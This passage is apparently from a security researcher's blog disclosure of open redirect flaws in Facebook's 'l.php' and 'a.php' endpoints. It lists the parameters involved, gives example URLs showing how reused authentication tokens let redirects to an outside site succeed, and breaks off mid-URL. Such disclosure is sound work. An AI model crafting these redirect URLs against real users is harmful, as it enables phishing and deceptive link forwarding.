<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><b>URL 2:</b></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="http://bg-bg.facebook.com/l.php?u=http%3A%2F%2Fweborama.com%2F&h=DAQEpwCpS&s=1" target="_blank">http://bg-bg.facebook.com/l.<wbr></wbr>php?u=http%3A%2F%2Fweborama.<wbr></wbr>com%2F&h=DAQEpwCpS&s=1</a></span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><b>Redirect Forbidden:</b></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="http://bg-bg.facebook.com/l.php?u=http%3A%2F%2Fwww.tetraph.com&h=DAQEpwCpS&s=1" target="_blank">http://bg-bg.facebook.com/l.<wbr></wbr>php?u=http%3A%2F%2Fwww.<wbr></wbr>tetraph.com&h=DAQEpwCpS&s=1</a></span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><b>Redirect Works:</b></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<a href="http://bg-bg.facebook.com/l.php?u=http%3A%2F%2Fwww.tetraph.com&h=wAQEE6xBX&s=1" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://bg-bg.facebook.com/l.<wbr></wbr>php?u=http%3A%2F%2Fwww.<wbr></wbr>tetraph.com&h=wAQEE6xBX&s=1</span></a></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><b>(2.2.2)</b></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">&lt;2&gt; Second test. It is the same situation as above.</span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">&lt;a&gt; file: "l.php"</span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">&lt;b&gt; URL parameter: "u"</span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">&lt;c&gt; authentication parameter: "h"</span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">&lt;d&gt; form: "h=hAQHalW1CAQHrkVIQNNqgwhxRWLNsFVeH3auuImlbR1CgKA".</span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">&lt;e&gt; The authentication token has no relation to any of the other parameters, such as "env" and "s".</span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">Examples:</span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><b>URL 1:</b></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="http://www.facebook.com/l.php?u=http%3A%2F%2Fwww.internet.org%2F&h=pAQHnUOVGAQGcsXLy0MBttG7W1uiOvSghc_POwYa6k35hbw&enc=AZNBNYyWIbhPD6ZDAw1Zom458dO6dNBHnPh1tWnzEgxsxqvjfAbnH1ynSYgNNOvQzY7oolrIRfkll4-z2Pm7C63N&s=1" target="_blank">http://www.facebook.com/l.php?<wbr></wbr>u=http%3A%2F%2Fwww.internet.<wbr></wbr>org%2F&h=<wbr></wbr>pAQHnUOVGAQGcsXLy0MBttG7W1uiOv<wbr></wbr>Sghc_POwYa6k35hbw&enc=<wbr></wbr>AZNBNYyWIbhPD6ZDAw1Zom458dO6dN<wbr></wbr>BHnPh1tWnzEgxsxqvjfAbnH1ynSYgN<wbr></wbr>NOvQzY7oolrIRfkll4-z2Pm7C63N&<wbr></wbr>s=1</a></span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><b>Redirect Forbidden:</b></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="http://www.facebook.com/l.php?u=http%3A%2F%2Fwww.tetraph.com&h=pAQHnUOVGAQGcsXLy0MBttG7W1uiOvSghc_POwYa6k35hbw&enc=AZNBNYyWIbhPD6ZDAw1Zom458dO6dNBHnPh1tWnzEgxsxqvjfAbnH1ynSYgNNOvQzY7oolrIRfkll4-z2Pm7C63N&s=1" target="_blank">http://www.facebook.com/l.php?<wbr></wbr>u=http%3A%2F%2Fwww.tetraph.<wbr></wbr>com&h=<wbr></wbr>pAQHnUOVGAQGcsXLy0MBttG7W1uiOv<wbr></wbr>Sghc_POwYa6k35hbw&enc=<wbr></wbr>AZNBNYyWIbhPD6ZDAw1Zom458dO6dN<wbr></wbr>BHnPh1tWnzEgxsxqvjfAbnH1ynSYgN<wbr></wbr>NOvQzY7oolrIRfkll4-z2Pm7C63N&<wbr></wbr>s=1</a></span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /><b>Redirect Works:</b></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<a href="http://www.facebook.com/l.php?u=http%3A%2F%2Fwww.tetraph.com&h=1AQFqhVX6AQGawLw_EuB6T8h4Fs6JXFOocaRp0tQKr6Mfxw&enc=AZM7oFmJObAuJmy999wnRjD-QralcP-Ust3CHBrFxZ85bS1oI5vS46cPhdJmYq6YcfsTcZYBrPTRsZyEeHCe_rdQ&s=1" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://www.facebook.com/l.php?<wbr></wbr>u=http%3A%2F%2Fwww.tetraph.<wbr></wbr>com&h=1AQFqhVX6AQGawLw_<wbr></wbr>EuB6T8h4Fs6JXFOocaRp0tQKr6Mfxw<wbr></wbr>&enc=AZM7oFmJObAuJmy999wnRjD-<wbr></wbr>QralcP-<wbr></wbr>Ust3CHBrFxZ85bS1oI5vS46cPhdJmY<wbr></wbr>q6YcfsTcZYBrPTRsZyEeHCe_rdQ&s=<wbr></wbr>1</span></a></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<a href="http://www.facebook.com/l.php?u=http%3A%2F%2Fwww.tetraph.com&h=1AQFqhVX6AQGawLw_EuB6T8h4Fs6JXFOocaRp0tQKr6Mfxw" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://www.facebook.com/l.php?<wbr></wbr>u=http%3A%2F%2Fwww.tetraph.<wbr></wbr>com&h=1AQFqhVX6AQGawLw_<wbr></wbr>EuB6T8h4Fs6JXFOocaRp0tQKr6Mfxw</span></a></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><b>URL 2:</b></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="http://af-za.facebook.com/l.php?u=http%3A%2F%2Fwww.youtube.com%2Fwatch%3Fv%3DNdWaZkvAJfM&h=WAQEcLD6fAQHtLbKKDhiimLXlIIx0zoyjfyusHjY5YHmaGQ&enc=AZMtxhh0RHpegvMkZLG-uyFxqCzDxCefM9H2AF8TnVCTtGMnwy5WVA4EPcZVOiJ0wOFCui6nWmRBqQDoZE0cVww6&s=1" target="_blank">http://af-za.facebook.com/l.<wbr></wbr>php?u=http%3A%2F%2Fwww.<wbr></wbr>youtube.com%2Fwatch%3Fv%<wbr></wbr>3DNdWaZkvAJfM&h=<wbr></wbr>WAQEcLD6fAQHtLbKKDhiimLXlIIx0z<wbr></wbr>oyjfyusHjY5YHmaGQ&enc=<wbr></wbr>AZMtxhh0RHpegvMkZLG-<wbr></wbr>uyFxqCzDxCefM9H2AF8TnVCTtGMnwy<wbr></wbr>5WVA4EPcZVOiJ0wOFCui6nWmRBqQDo<wbr></wbr>ZE0cVww6&s=1</a></span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><b>Redirect Forbidden:</b></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="http://af-za.facebook.com/l.php?u=http%3A%2F%2Fwww.tetraph.com&h=GAQHkk7KaAQFgp-1UpPt8vTc1mpZVcR-ZCObBHYZTd6oRUA&enc=AZPA-1iOt4L5BTDo2RMqXagplQxCjYMuw6LZzH3XdMeOpvvcwMdzZwplx5OZLlH0q8QszFr2Nu9Ib_tA8l8So-pW&s=1" target="_blank">http://af-za.facebook.com/l.<wbr></wbr>php?u=http%3A%2F%2Fwww.<wbr></wbr>tetraph.com&h=GAQHkk7KaAQFgp-<wbr></wbr>1UpPt8vTc1mpZVcR-<wbr></wbr>ZCObBHYZTd6oRUA&enc=AZPA-<wbr></wbr>1iOt4L5BTDo2RMqXagplQxCjYMuw6L<wbr></wbr>ZzH3XdMeOpvvcwMdzZwplx5OZLlH0q<wbr></wbr>8QszFr2Nu9Ib_tA8l8So-pW&s=1</a></span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><b>Redirect Works:</b></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<a href="http://af-za.facebook.com/l.php?u=http%3A%2F%2Fwww.tetraph.com&h=WAQEcLD6fAQHtLbKKDhiimLXlIIx0zoyjfyusHjY5YHmaGQ&enc=AZMtxhh0RHpegvMkZLG-uyFxqCzDxCefM9H2AF8TnVCTtGMnwy5WVA4EPcZVOiJ0wOFCui6nWmRBqQDoZE0cVww6&s=1" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://af-za.facebook.com/l.<wbr></wbr>php?u=http%3A%2F%2Fwww.<wbr></wbr>tetraph.com&h=<wbr></wbr>WAQEcLD6fAQHtLbKKDhiimLXlIIx0z<wbr></wbr>oyjfyusHjY5YHmaGQ&enc=<wbr></wbr>AZMtxhh0RHpegvMkZLG-<wbr></wbr>uyFxqCzDxCefM9H2AF8TnVCTtGMnwy<wbr></wbr>5WVA4EPcZVOiJ0wOFCui6nWmRBqQDo<wbr></wbr>ZE0cVww6&s=1</span></a></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><b>(3) Facebook File "a.php" Open Redirect Security Vulnerability</b></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><b>(3.1)</b></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">(a) file: "a.php"</span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">(b) parameter "u"</span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">(c) authentication parameter: "eid"</span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">(d) form: "eid=5967147530925355409.<wbr></wbr>6013336879369.<wbr></wbr>AQKBG5nt468YgKeiSdgExZQRjwGb9r<wbr></wbr>6EOu-Uc5WPvi-<wbr></wbr>EVHEzadq8YSrgSvUzbMmxKPPfTgM-<wbr></wbr>JrPff7tN38luc-8h16lxL0Gj_4qs1-<wbr></wbr>58yWgXirMH4AEf8sOEsZc5DTx7yFnd<wbr></wbr>gODvD5NrC-<wbr></wbr>314BIj4pZvMhlljXv89lHRH6pBgyGG<wbr></wbr>Vm-<wbr></wbr>oWBDIF8CuRER1f5ZGbKdsiUcBISdWT<wbr></wbr>ninVzvBdW1mZY0SWzqT21fZmhgVKtd<wbr></wbr>kRf5l_<wbr></wbr>pag7hAmotFK9HI5XHfGicWVqzRyTNi<wbr></wbr>DIYjyVjTv4km2FOEp7WP3w65aVUKP_<wbr></wbr>w".</span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">(e) The authentication value is independent of all the other parameters, such as "mac" and "__tn__".</span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">Examples:</span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><b>Vulnerable URL:</b></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<a href="https://www.facebook.com/a.php?u=http%3A%2F%2Ffb-nym.adnxs.com%2Ffclick%3Fclickenc%3Dhttp%253A%252F%252Fbs.serving-sys.com%252FBurstingPipe%252FadServer.bs%253Fcn%253Dtf%2526c%253D20%2526mc%253Dclick%2526pli%253D8782431%2526PluID%253D0%2526ord%253D%257BCACHEBUSTER%257D%26cp%3D%253Fdi%253DzGxX6INl-T9QvRSibN_3P5qZmZmZmfk_UL0Uomzf9z_ObFfog2X5P_WPPCuD-to_CKEeLew3cQIQkc9SAAAAAHQcDQB2BQAAKAcAAAIAAAD4iq8AanMCAAAAAQBVU0QAVVNEAGMASABq4DoFka4BAgUCAQUAAIgAkinLswAAAAA.%252Fcnd%253D%252521qQYdPgjeqqYBEPiVvgUY6uYJIAA.%252Freferrer%253Dfacebook.com%252F&mac=AQJllyaGzLYoRoQz&__tn__=%2AB&eid=5967147530925355409.6013336879369.AQKBG5nt468YgKeiSdgExZQRjwGb9r6EOu-Uc5WPvi-EVHEzadq8YSrgSvUzbMmxKPPfTgM-JrPff7tN38luc-8h16lxL0Gj_4qs1-58yWgXirMH4AEf8sOEsZc5DTx7yFndgODvD5NrC-314BIj4pZvMhlljXv89lHRH6pBgyGGVm-oWBDIF8CuRER1f5ZGbKdsiUcBISdWTninVzvBdW1mZY0SWzqT21fZmhgVKtdkRf5l_pag7hAmotFK9HI5XHfGicWVqzRyTNiDIYjyVjTv4km2FOEp7WP3w65aVUKP_w" target="_blank"><span style="color: black; font-family: Arial, Helvetica, 
sans-serif;">https://www.facebook.com/a.<wbr></wbr>php?u=http%3A%2F%2Ffb-nym.<wbr></wbr>adnxs.com%2Ffclick%3Fclickenc%<wbr></wbr>3Dhttp%253A%252F%252Fbs.<wbr></wbr>serving-sys.com%<wbr></wbr>252FBurstingPipe%252FadServer.<wbr></wbr>bs%253Fcn%253Dtf%2526c%253D20%<wbr></wbr>2526mc%253Dclick%2526pli%<wbr></wbr>253D8782431%2526PluID%253D0%<wbr></wbr>2526ord%253D%257BCACHEBUSTER%<wbr></wbr>257D%26cp%3D%253Fdi%<wbr></wbr>253DzGxX6INl-T9QvRSibN_<wbr></wbr>3P5qZmZmZmfk_UL0Uomzf9z_<wbr></wbr>ObFfog2X5P_WPPCuD-to_<wbr></wbr>CKEeLew3cQIQkc9SAAAAAHQcDQB2BQ<wbr></wbr>AAKAcAAAIAAAD4iq8AanMCAAAAAQBV<wbr></wbr>U0QAVVNEAGMASABq4DoFka4BAgUCAQ<wbr></wbr>UAAIgAkinLswAAAAA.%252Fcnd%<wbr></wbr>253D%<wbr></wbr>252521qQYdPgjeqqYBEPiVvgUY6uYJ<wbr></wbr>IAA.%252Freferrer%<wbr></wbr>253Dfacebook.com%252F&mac=<wbr></wbr>AQJllyaGzLYoRoQz&__tn__=%2AB&<wbr></wbr>eid=5967147530925355409.<wbr></wbr>6013336879369.<wbr></wbr>AQKBG5nt468YgKeiSdgExZQRjwGb9r<wbr></wbr>6EOu-Uc5WPvi-<wbr></wbr>EVHEzadq8YSrgSvUzbMmxKPPfTgM-<wbr></wbr>JrPff7tN38luc-8h